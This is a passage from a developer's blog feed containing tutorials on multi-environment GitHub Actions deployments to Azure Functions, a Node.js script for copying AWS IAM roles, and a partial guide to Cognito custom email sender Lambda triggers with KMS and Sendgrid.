href="https://github.com/Azure/app-service-announcements-discussions/issues/32">https://github.com/Azure/app-service-announcements-discussions/issues/32</a></li> <li><a href="https://adrianhall.github.io/typescript/2019/10/23/terraform-functions/">https://adrianhall.github.io/typescript/2019/10/23/terraform-functions/</a></li> <li><a href="https://github.com/maximivanov/publish-az-func-code-with-terraform">https://github.com/maximivanov/publish-az-func-code-with-terraform</a></li> </ul> <h2> ... </h2> <p>Deploy Azure Functions resources as well as code with Terraform when you don't want extra dependencies used just for publishing.</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i">follow me</a> on Twitter for the latest updates.</em></p> azure serverless devops terraform Github Actions: deploy to multiple environments from single workflow Max Ivanov Mon, 22 Mar 2021 01:49:13 +0000 https://forem.com/maxivanov/github-actions-deploy-to-multiple-environments-from-single-workflow-3in0 https://forem.com/maxivanov/github-actions-deploy-to-multiple-environments-from-single-workflow-3in0 <p>Github Actions is awesome and you can automate so much with it. One lacking feature though is <a href="https://github.com/actions/starter-workflows/issues/245">support for code reuse</a> in workflow yaml files.</p> <p>One particular use case where it would be useful is continuous deployment workflow that <strong>publishes latest code</strong> to the remote system. Deployment target is dictated by the git branch that receives the update.</p> <p>E.g. pushes to <code>dev</code> branch should deploy to the <code>staging</code> environment and pushes to <code>master</code> should publish the code to prod.</p> <p>Here's a workaround to deploy to multiple environments from a single workflow yaml file.</p> <h2> Example workflow file </h2> <p>As an example, I'll take a Github Action that deploys an Azure Function app. </p> <p>In order to publish code to Azure, it expects 2 variables: function app name and publish profile (deployment key).</p> <p>Each environment has its own publish profile defined in an <strong>individual Github Repository Secret</strong>.</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--cQp_ovvk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/03/github-actions-deploy-to-multiple-environments-from-single-workflow/github-repository-secrets.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cQp_ovvk--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/03/github-actions-deploy-to-multiple-environments-from-single-workflow/github-repository-secrets.webp" alt="github repository secrets"></a></p> <p>Below is the relevant parts of the workflow yaml. You can see it in full <a href="https://github.com/maximivanov/azure-functions-cd-github-actions/blob/dev/.github/workflows/cd.yml">here</a>.</p> <p>First, we want to trigger the workflow <strong>only on branches</strong> that should be deployed on commit:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">on</span><span class="pi">:</span> <span class="na">push</span><span class="pi">:</span> <span class="na">branches</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">dev</span> <span class="pi">-</span> <span class="s">master</span> </code></pre> </div> <p>Next, in the very beginning of the workflow definition, we add <strong>conditional steps</strong> to set correct environment variables, depending on the <strong>current branch</strong>:</p> <ul> <li>Function app name</li> <li>Publish profile secret name </li> </ul> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">jobs</span><span class="pi">:</span> <span class="na">deploy</span><span class="pi">:</span> <span class="na">runs-on</span><span class="pi">:</span> <span class="s">ubuntu-latest</span> <span class="na">steps</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Set env vars (dev)</span> <span class="na">if</span><span class="pi">:</span> <span class="s">endsWith(github.ref, '/dev')</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">echo "AZURE_FUNCTIONAPP_NAME=azfunccdgh-dev-function-app" &gt;&gt; $GITHUB_ENV</span> <span class="s">echo "PUBLISH_PROFILE_VAR_NAME=AZURE_FUNCTIONAPP_PUBLISH_PROFILE_DEV" &gt;&gt; $GITHUB_ENV</span> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Set env vars (prod)</span> <span class="na">if</span><span class="pi">:</span> <span class="s">endsWith(github.ref, '/master')</span> <span class="na">run</span><span class="pi">:</span> <span class="pi">|</span> <span class="s">echo "AZURE_FUNCTIONAPP_NAME=azfunccdgh-prod-function-app" &gt;&gt; $GITHUB_ENV</span> <span class="s">echo "PUBLISH_PROFILE_VAR_NAME=AZURE_FUNCTIONAPP_PUBLISH_PROFILE_PROD" &gt;&gt; $GITHUB_ENV</span> </code></pre> </div> <p>Following would be the steps that are shared between environments. These are not relevant to the multi-env deployment and are not listed here. In my case it's checking out the code, caching, installing dependencies and building the project.</p> <p>Finally, the deployment step uses the environment variables set above to <strong>publish the code</strong> to the correct target environment.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code> <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">Run Azure Functions action</span> <span class="na">uses</span><span class="pi">:</span> <span class="s">Azure/functions-action@v1</span> <span class="na">id</span><span class="pi">:</span> <span class="s">fa</span> <span class="na">with</span><span class="pi">:</span> <span class="na">app-name</span><span class="pi">:</span> <span class="s">${{ env.AZURE_FUNCTIONAPP_NAME }}</span> <span class="na">package</span><span class="pi">:</span> <span class="s">${{ env.AZURE_FUNCTIONAPP_PACKAGE_PATH }}</span> <span class="na">publish-profile</span><span class="pi">:</span> <span class="s">${{ secrets[env.PUBLISH_PROFILE_VAR_NAME] }}</span> <span class="na">respect-funcignore</span><span class="pi">:</span> <span class="no">true</span> </code></pre> </div> <h2> References </h2> <ul> <li><a href="https://github.com/actions/starter-workflows/issues/245">https://github.com/actions/starter-workflows/issues/245</a></li> <li><a href="https://github.com/maximivanov/azure-functions-cd-github-actions">https://github.com/maximivanov/azure-functions-cd-github-actions</a></li> </ul> <h2> ... </h2> <p>Still, this is a hack I'm not very happy about but I feel like it's better than having copies of the entire workflow file per environment. </p> <p>If you know a better way to deploy to multiple environments from Github Actions, let me know!</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i">follow me</a> on Twitter for the latest updates.</em></p> github tutorial productivity webdev How to make a copy of AWS IAM role Max Ivanov Mon, 15 Mar 2021 21:28:06 +0000 https://forem.com/maxivanov/how-to-make-a-copy-of-aws-iam-role-328a https://forem.com/maxivanov/how-to-make-a-copy-of-aws-iam-role-328a <p>It may happen that you need to make a <strong>copy of an IAM role</strong> in AWS. Maybe you want to experiment with changing role's permission scope but you don't want to touch the role that is currently in use.</p> <p>One way to approach it is to duplicate the existing role along with <strong>all its policies</strong>, make the needed change on the new role and run your tests.</p> <p>There's no <code>aws iam copy-role</code> command though... So your only option is to duplicate the role and its associated policies manually or to script the process.</p> <p>Here's an implementation of such a script in Node.js. It will make a copy of the role with its trust relationship policy, inline policies and managed polcies (both AWS- and customer-managed).</p> <p>You can find the code in the <a href="https://github.com/maximivanov/aws-iam-copy-role">repository</a>.</p> <h2> Prerequisites </h2> <p>You need Node.js to run the script.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>node <span class="nt">--version</span> v14.15.5 <span class="c"># also tested with v12.21.0</span> </code></pre> </div> <p>If you don't have Node installed locally, you can run the script in Docker:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>docker run <span class="nt">-it</span> <span class="nt">--rm</span> <span class="nt">-v</span> <span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span>:/var/app <span class="nt">-w</span> /var/app node:14-alpine sh <span class="nb">export </span><span class="nv">AWS_ACCESS_KEY_ID</span><span class="o">=</span>... <span class="nb">export </span><span class="nv">AWS_SECRET_ACCESS_KEY</span><span class="o">=</span>... </code></pre> </div> <h2> Usage </h2> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>npm <span class="nb">install</span> </code></pre> </div> <p>To copy a role, pass source and target role names (not ARNs) to the script:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>node copy-role.js SOURCE_ROLE_NAME TARGET_ROLE_NAME </code></pre> </div> <p>Example output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>/var/app <span class="c"># node copy-role.js copy-role-poc copy-role-poc-target-role</span> <span class="nt">--</span><span class="o">&gt;</span> Parsing arguments from <span class="nb">command </span>line... &lt;<span class="nt">--</span> Arguments loaded. Source role name: copy-role-poc, target role name: copy-role-poc-target-role <span class="nt">--</span><span class="o">&gt;</span> Checking <span class="k">if </span>AWS credentials are loaded... &lt;<span class="nt">--</span> Credentials found. <span class="nt">--</span><span class="o">&gt;</span> Fetching <span class="nb">source </span>role... &lt;<span class="nt">--</span> Source role loaded. <span class="nt">--</span><span class="o">&gt;</span> Fetching inline policies <span class="k">for </span>the role... &lt;<span class="nt">--</span> Loaded 2 inline policy names. <span class="nt">--</span><span class="o">&gt;</span> Fetching inline policies... &lt;<span class="nt">--</span> Loaded inline policies. <span class="nt">--</span><span class="o">&gt;</span> Fetching managed policies <span class="k">for </span>the role... &lt;<span class="nt">--</span> Loaded 2 managed policies. <span class="nt">--</span><span class="o">&gt;</span> Creating a new role copy-role-poc-target-role... &lt;<span class="nt">--</span> Created role copy-role-poc-target-role. <span class="nt">--</span><span class="o">&gt;</span> Adding inline policies to copy-role-poc-target-role... &lt;<span class="nt">--</span> Added 2 inline policies. <span class="nt">--</span><span class="o">&gt;</span> Adding managed policies to copy-role-poc-target-role... &lt;<span class="nt">--</span> Added 2 managed policies. </code></pre> </div> <h2> Implementation details </h2> <p>You can inspect the code in the repository if you wish. In a nutshell it uses AWS JavaScript SDK to do the following:</p> <ol> <li>Fetch the source role along with its trust relationship policy</li> <li>Fetch inline policies of the source role</li> <li>Fetch managed policies of the source role (both AWS- and customer-created)</li> <li>Create a new role copying over all relevant properties (<code>Path</code>, <code>AssumeRolePolicyDocument</code>, <code>Description</code>, <code>MaxSessionDuration</code>, <code>PermissionsBoundary</code>, <code>Tags</code>)</li> <li>Add all inline policies found in the source role to the new role</li> <li>Attach all managed policies from the source role</li> </ol> <p>The process is quite straightforward... The only interesting detail is steps 2 and 3 require recursive fetch to accomodate the fact that policies response can be paginated.</p> <p><a href="https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/IAM.html">AWS SDK APIs</a> used:</p> <ul> <li><code>getRole()</code></li> <li><code>listRolePolicies()</code></li> <li><code>getRolePolicy()</code></li> <li><code>listAttachedRolePolicies()</code></li> <li><code>createRole()</code></li> <li><code>putRolePolicy()</code></li> <li><code>attachRolePolicy()</code></li> </ul> <p>Finally, it was a chance to add some <a href="https://textart.sh/">ASCII art</a>:</p> <p><a href="https://res.cloudinary.com/practicaldev/image/fetch/s--cfz0YCxG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/03/copy-aws-iam-role/error-message.webp" class="article-body-image-wrapper"><img src="https://res.cloudinary.com/practicaldev/image/fetch/s--cfz0YCxG--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://www.maxivanov.io/posts/2021/03/copy-aws-iam-role/error-message.webp" alt="error message"></a></p> <h2> References </h2> <ul> <li><a href="https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/IAM.html">https://docs.aws.amazon.com/AWSJavaScriptSDK/latest/AWS/IAM.html</a></li> <li><a href="https://stackoverflow.com/questions/61221952/need-to-make-an-identical-copy-of-aws-iam-role-including-policies-and-trust-rel">https://stackoverflow.com/questions/61221952/need-to-make-an-identical-copy-of-aws-iam-role-including-policies-and-trust-rel</a></li> <li><a href="https://github.com/maximivanov/aws-iam-copy-role">https://github.com/maximivanov/aws-iam-copy-role</a></li> </ul> <h2> ... </h2> <p><em>Automate once and use forever</em> they say. Honestly I only needed to use it once so far... 🙃 </p> <p>Can I put it as <em>automate once and share for everyone to use</em>? That makes more sense hopefully!</p> <p><em>If you like this type of content you can <a href="https://twitter.com/max_v_i">follow me</a> on Twitter for the latest updates.</em></p> aws node tutorial tooling Send AWS Cognito emails with 3rd party ESPs Max Ivanov Wed, 10 Mar 2021 02:21:24 +0000 https://forem.com/maxivanov/send-aws-cognito-emails-with-3rd-party-esps-3cok https://forem.com/maxivanov/send-aws-cognito-emails-with-3rd-party-esps-3cok <p>In AWS Cognito, the default method of sending emails and SMS messages is AWS' own services: SES and SNS correspondingly.</p> <p>Usually it makes sense, you're already in the AWS ecosystem anyway... But what if you have a requirement to use a <strong>3rd party ESP (Email Service Provider)</strong>, like Twilio Sendgrid or Mailgun/Sendinblue/Mailchimp? Some of the reasons could be:</p> <ul> <li>Designers need easy access to the email templates in the ESP UI</li> <li>Users need a way to unsubscribe from the emails they receive (subscription status tracked by the ESP)</li> <li>Your company relies on analytics tools provided by ESPs which you wouldn't have with SES</li> <li>The email template is large (html and css-wise) and it doesn't fit into Cognito's 20k characters limit</li> <li>You do not want to (additionally) authenticate SES origin (SPF, DKIM, DMARC)</li> <li>You want to reuse high-reputation IP addresses managed by the ESP</li> </ul> <p>There's a <strong>Custom message Lambda trigger</strong> (e.g. invoked by <code>CustomMessage_ForgotPassword</code> user action) but it will only allow you to customize the email subject and body, not change the underlying transport.</p> <p>Sometime late 2020, AWS added a new type of Lambda trigger to Cognito: <strong>Custom Sender Lambda Triggers</strong>. </p> <p>Cognito documentation is a bit lacking... The code is not copypastable and some steps in the instructions are missing.<br> Furthermore it doesn't show how to configure custom email and SMS senders with infrastructure as code.</p> <p>Below is a guide to deploying and using these new Cognito Lambda triggers. <br> We will see how to deploy them with <strong>Cloudformation and Terraform</strong>.</p> <h2> Custom sender Lambda triggers </h2> <p>More specifically, there are 2 new triggers:</p> <ul> <li> <code>CustomEmailSender</code> to override the default (SES) way of sending emails</li> <li> <code>CustomSMSSender</code> when you need to use an external service for text messages instead of SNS</li> </ul> <p>In this post we will focus on the <strong>custom email sender Lambda</strong>, but the process for custom SMS sender is identical.</p> <p>The parameters these Lambda triggers receive from Cognito are a bit different from what Custom Message Trigger gets. With <code>CustomMessage_*</code> triggers no secrets are passed to the code. Instead, you get a placeholder string that you put in the right place in the email or SMS to be sent. That placeholder gets replaced with the code by Cognito right before the notification is sent.</p> <p>Custom sender triggers on the other hand receive <strong>encrypted notification code</strong>. Thus we will need to set up a KMS key - for Cognito to encrypt the codes and for us to decrypt them in the function code.</p> <p>How are new triggers supported by the tooling?</p> <ul> <li>Cognito Console doesn't let you configure the triggers yet</li> <li>Cognito documentation suggests using AWS CLI to configure triggers</li> <li>CloudFormation docs say the feature is not yet supported. From my tests it worked, probably the docs are not updated yet</li> <li>Terraform does not yet support it but there's a workaround</li> </ul> <h2> Send Cognito emails with Twilio Sendgrid </h2> <p>For the demo, we will register a new user in Cognito and will make sure the email is sent with Sendgrid.</p> <p>Prerequisites to follow along:</p> <ul> <li>AWS account</li> <li>Sendgrid account (or whichever ESP you're using)</li> <li>Docker</li> </ul> <p>That's right, no AWS CLI, no Node.js, Docker is the only dev dependency. What a beautiful time to be a developer in!</p> <p>Since this is not a tutorial on how to deploy Cognito, I will focus only on parts relevant to the custom sender triggers.</p> <p>You can find <strong>full code with all resources</strong> defined in CloudFormation and Terraform in the <a href="https://github.com/maximivanov/cognito-custom-email-sender-lambda">demo repository</a>.</p> <h2> Create KMS key </h2> <p>As mentioned above we need a key to encrypt/decrypt the notification code. The key policy matches the default permissions for a new KMS key when it is created with AWS Console.</p> <p><strong>CloudFormation</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">Parameters</span><span class="pi">:</span> <span class="s">...</span> <span class="s">CallingUserArn</span><span class="pi">:</span> <span class="na">Description</span><span class="pi">:</span> <span class="s">Calling user ARN</span> <span class="na">Type</span><span class="pi">:</span> <span class="s">String</span> <span class="na">Resources</span><span class="pi">:</span> <span class="s">...</span> <span class="s">KmsKey</span><span class="pi">:</span> <span class="na">Type</span><span class="pi">:</span> <span class="s">AWS::KMS::Key</span> <span class="na">Properties</span><span class="pi">:</span> <span class="na">Enabled</span><span class="pi">:</span> <span class="no">true</span> <span class="na">KeyPolicy</span><span class="pi">:</span> <span class="na">Version</span><span class="pi">:</span> <span class="s1">'</span><span class="s">2012-10-17'</span> <span class="na">Statement</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">Effect</span><span class="pi">:</span> <span class="s">Allow</span> <span class="na">Principal</span><span class="pi">:</span> <span class="na">AWS</span><span class="pi">:</span> <span class="kt">!Sub</span> <span class="s1">'</span><span class="s">arn:aws:iam::${AWS::AccountId}:root'</span> <span class="na">Action</span><span class="pi">:</span> <span class="s1">'</span><span class="s">kms:*'</span> <span class="na">Resource</span><span class="pi">:</span> <span class="s1">'</span><span class="s">*'</span> <span class="pi">-</span> <span class="na">Effect</span><span class="pi">:</span> <span class="s">Allow</span> <span class="na">Principal</span><span class="pi">:</span> <span class="na">AWS</span><span class="pi">:</span> <span class="kt">!Ref</span> <span class="s">CallingUserArn</span> <span class="na">Action</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Create*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Describe*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Enable*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:List*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Put*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Update*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Revoke*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Disable*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Get*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Delete*"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:TagResource"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:UntagResource"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:ScheduleKeyDeletion"</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:CancelKeyDeletion"</span> <span class="na">Resource</span><span class="pi">:</span> <span class="s1">'</span><span class="s">*'</span> </code></pre> </div> <p><code>CallingUserArn</code> parameter is a little trick to <strong>pass calling IAM user's ARN</strong> to CloudFormation:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>aws cloudformation deploy ... <span class="nt">--parameter-overrides</span> <span class="nv">CallingUserArn</span><span class="o">=</span><span class="s2">"</span><span class="si">$(</span>aws sts get-caller-identity <span class="nt">--query</span> Arn <span class="nt">--output</span> text<span class="si">)</span><span class="s2">"</span> </code></pre> </div> <p><strong>Terraform</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">data</span> <span class="s2">"aws_caller_identity"</span> <span class="s2">"current"</span> <span class="p">{}</span> <span class="nx">resource</span> <span class="s2">"aws_kms_key"</span> <span class="s2">"kms_key"</span> <span class="p">{</span> <span class="nx">description</span> <span class="p">=</span> <span class="s2">"KMS key for Cognito Lambda trigger"</span> <span class="nx">policy</span> <span class="p">=</span> <span class="o">&lt;&lt;</span><span class="no">EOF</span><span class="sh"> { "Version": "2012-10-17", "Statement": [ { "Effect": "Allow", "Principal": { "AWS": "arn:aws:iam::${data.aws_caller_identity.current.account_id}:root" }, "Action": "kms:*", "Resource": "*" }, { "Effect": "Allow", "Principal": { "AWS": "${data.aws_caller_identity.current.arn}" }, "Action": [ "kms:Create*", "kms:Describe*", "kms:Enable*", "kms:List*", "kms:Put*", "kms:Update*", "kms:Revoke*", "kms:Disable*", "kms:Get*", "kms:Delete*", "kms:TagResource", "kms:UntagResource", "kms:ScheduleKeyDeletion", "kms:CancelKeyDeletion" ], "Resource": "*" } ] } </span><span class="no">EOF </span><span class="p">}</span> </code></pre> </div> <h2> Create Lambda IAM role </h2> <p>Besides the standard <code>AWSLambdaBasicExecutionRole</code> managed policy, we need to grant Lambda access to <strong>decrypt our KMS key</strong>.<br> <em>Note you probably want to replace <code>AWSLambdaBasicExecutionRole</code> with a fine-grained policy so that it has the least required privileges</em>.</p> <p>For both CF and TF scripts, the outcome is the same: a <strong>role for the Lambda trigger with 2 policies attached</strong>.</p> <p><strong>CloudFormation</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">Resources</span><span class="pi">:</span> <span class="s">...</span> <span class="s">LambdaTriggerRole</span><span class="pi">:</span> <span class="na">Type</span><span class="pi">:</span> <span class="s">AWS::IAM::Role</span> <span class="na">Properties</span><span class="pi">:</span> <span class="na">AssumeRolePolicyDocument</span><span class="pi">:</span> <span class="na">Version</span><span class="pi">:</span> <span class="s2">"</span><span class="s">2012-10-17"</span> <span class="na">Statement</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">Effect</span><span class="pi">:</span> <span class="s">Allow</span> <span class="na">Action</span><span class="pi">:</span> <span class="s2">"</span><span class="s">sts:AssumeRole"</span> <span class="na">Principal</span><span class="pi">:</span> <span class="na">Service</span><span class="pi">:</span> <span class="s2">"</span><span class="s">lambda.amazonaws.com"</span> <span class="na">ManagedPolicyArns</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole</span> <span class="na">LambdaTriggerRoleKmsPolicy</span><span class="pi">:</span> <span class="na">Type</span><span class="pi">:</span> <span class="s">AWS::IAM::Policy</span> <span class="na">Properties</span><span class="pi">:</span> <span class="na">PolicyDocument</span><span class="pi">:</span> <span class="na">Version</span><span class="pi">:</span> <span class="s2">"</span><span class="s">2012-10-17"</span> <span class="na">Statement</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">Effect</span><span class="pi">:</span> <span class="s2">"</span><span class="s">Allow"</span> <span class="na">Action</span><span class="pi">:</span> <span class="pi">-</span> <span class="s2">"</span><span class="s">kms:Decrypt"</span> <span class="na">Resource</span><span class="pi">:</span> <span class="kt">!GetAtt</span> <span class="s">KmsKey.Arn</span> <span class="na">PolicyName</span><span class="pi">:</span> <span class="s2">"</span><span class="s">LambdaKmsPolicy"</span> <span class="na">Roles</span><span class="pi">:</span> <span class="pi">-</span> <span class="kt">!Ref</span> <span class="s">LambdaTriggerRole</span> </code></pre> </div> <p><strong>Terraform</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight hcl"><code><span class="nx">data</span> <span class="s2">"aws_iam_policy_document"</span> <span class="s2">"AWSLambdaTrustPolicy"</span> <span class="p">{</span> <span class="nx">version</span> <span class="p">=</span> <span class="s2">"2012-10-17"</span> <span class="nx">statement</span> <span class="p">{</span> <span class="nx">actions</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"sts:AssumeRole"</span><span class="p">]</span> <span class="nx">effect</span> <span class="p">=</span> <span class="s2">"Allow"</span> <span class="nx">principals</span> <span class="p">{</span> <span class="nx">type</span> <span class="p">=</span> <span class="s2">"Service"</span> <span class="nx">identifiers</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"lambda.amazonaws.com"</span><span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role"</span> <span class="s2">"iam_role"</span> <span class="p">{</span> <span class="nx">assume_role_policy</span> <span class="p">=</span> <span class="nx">data</span><span class="err">.</span><span class="nx">aws_iam_policy_document</span><span class="err">.</span><span class="nx">AWSLambdaTrustPolicy</span><span class="err">.</span><span class="nx">json</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.project}-iam-role-lambda-trigger"</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role_policy_attachment"</span> <span class="s2">"iam_role_policy_attachment_lambda_basic_execution"</span> <span class="p">{</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="err">.</span><span class="nx">iam_role</span><span class="err">.</span><span class="nx">name</span> <span class="nx">policy_arn</span> <span class="p">=</span> <span class="s2">"arn:aws:iam::aws:policy/service-role/AWSLambdaBasicExecutionRole"</span> <span class="p">}</span> <span class="nx">data</span> <span class="s2">"aws_iam_policy_document"</span> <span class="s2">"iam_policy_document_lambda_kms"</span> <span class="p">{</span> <span class="nx">version</span> <span class="p">=</span> <span class="s2">"2012-10-17"</span> <span class="nx">statement</span> <span class="p">{</span> <span class="nx">actions</span> <span class="p">=</span> <span class="p">[</span><span class="s2">"kms:Decrypt"</span><span class="p">]</span> <span class="nx">effect</span> <span class="p">=</span> <span class="s2">"Allow"</span> <span class="nx">resources</span> <span class="p">=</span> <span class="p">[</span> <span class="nx">aws_kms_key</span><span class="err">.</span><span class="nx">kms_key</span><span class="err">.</span><span class="nx">arn</span> <span class="p">]</span> <span class="p">}</span> <span class="p">}</span> <span class="nx">resource</span> <span class="s2">"aws_iam_role_policy"</span> <span class="s2">"iam_role_policy_lambda_kms"</span> <span class="p">{</span> <span class="nx">name</span> <span class="p">=</span> <span class="s2">"${var.project}-iam-role-policy-lambda-kms"</span> <span class="nx">role</span> <span class="p">=</span> <span class="nx">aws_iam_role</span><span class="err">.</span><span class="nx">iam_role</span><span class="err">.</span><span class="nx">name</span> <span class="nx">policy</span> <span class="p">=</span> <span class="nx">data</span><span class="err">.</span><span class="nx">aws_iam_policy_document</span><span class="err">.</span><span class="nx">iam_policy_document_lambda_kms</span><span class="err">.</span><span class="nx">json</span> <span class="p">}</span> </code></pre> </div> <h2> Create Lambda function (Node.js code) </h2> <p>Unlike the AWS SDK itself, <code>@aws-crypto/client-node</code> encryption library has to be <strong>packaged and deployed</strong> with the code. If you don't have Node.js installed locally, you can install dependencies with Docker. Assuming you're in the cloned repo:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">cd </span>lambda/ docker run <span class="nt">-it</span> <span class="nt">--rm</span> <span class="nt">-v</span> <span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span>:/var/app node:12 bash npm i </code></pre> </div> <p>The function code:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">AWS</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">aws-sdk</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">b64</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">base64-js</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">encryptionSdk</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">@aws-crypto/client-node</span><span class="dl">'</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">sgMail</span> <span class="o">=</span> <span class="nx">require</span><span class="p">(</span><span class="dl">"</span><span class="s2">@sendgrid/mail</span><span class="dl">"</span><span class="p">)</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">decrypt</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">encryptionSdk</span><span class="p">.</span><span class="nx">buildClient</span><span class="p">(</span><span class="nx">encryptionSdk</span><span class="p">.</span><span class="nx">CommitmentPolicy</span><span class="p">.</span><span class="nx">REQUIRE_ENCRYPT_ALLOW_DECRYPT</span><span class="p">)</span> <span class="kd">const</span> <span class="nx">keyIds</span> <span class="o">=</span> <span class="p">[</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">KEY_ID</span><span class="p">];</span> <span class="kd">const</span> <span class="nx">keyring</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">encryptionSdk</span><span class="p">.</span><span class="nx">KmsKeyringNode</span><span class="p">({</span> <span class="nx">keyIds</span> <span class="p">})</span> <span class="nx">sgMail</span><span class="p">.</span><span class="nx">setApiKey</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">SENDGRID_API_KEY</span><span class="p">)</span> <span class="nx">exports</span><span class="p">.</span><span class="nx">handler</span> <span class="o">=</span> <span class="k">async</span><span class="p">(</span><span class="nx">event</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">let</span> <span class="nx">plainTextCode</span> <span class="k">if</span> <span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nx">code</span><span class="p">)</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">plaintext</span><span class="p">,</span> <span class="nx">messageHeader</span> <span class="p">}</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">decrypt</span><span class="p">(</span><span class="nx">keyring</span><span class="p">,</span> <span class="nx">b64</span><span class="p">.</span><span class="nx">toByteArray</span><span class="p">(</span><span class="nx">event</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nx">code</span><span class="p">))</span> <span class="nx">plainTextCode</span> <span class="o">=</span> <span class="nx">plaintext</span> <span class="p">}</span> <span class="kd">const</span> <span class="nx">msg</span> <span class="o">=</span> <span class="p">{</span> <span class="na">to</span><span class="p">:</span> <span class="nx">event</span><span class="p">.</span><span class="nx">request</span><span class="p">.</span><span class="nx">userAttributes</span><span class="p">.</span><span class="nx">email</span><span class="p">,</span> <span class="na">from</span><span class="p">:</span> <span class="dl">"</span><span class="s2">cognito-test@maxivanov.io</span><span class="dl">"</span><span class="p">,</span> <span class="na">subject</span><span class="p">:</span> <span class="dl">"</span><span class="s2">Your Cognito code</span><span class="dl">"</span><span class="p">,</span> <span class="na">text</span><span class="p">:</span> <span class="s2">`Your code: </span><span class="p">${</span><span class="nx">plainTextCode</span><span class="p">.</span><span class="nx">toString</span><span class="p">()}</span><span class="s2">`</span><span class="p">,</span> <span class="p">}</span> <span class="k">await</span> <span class="nx">sgMail</span><span class="p">.</span><span class="nx">send</span><span class="p">(</span><span class="nx">msg</span><span class="p">)</span> <span class="p">}</span> </code></pre> </div> <p>It expects the KMS key ARN and ESP API key to be passed as environment variables. The notification code is decrypted and can be used in the message body sent to the email provider API for delivery.</p> <p><strong>Example <code>event</code> object</strong> passed to the function:<br> 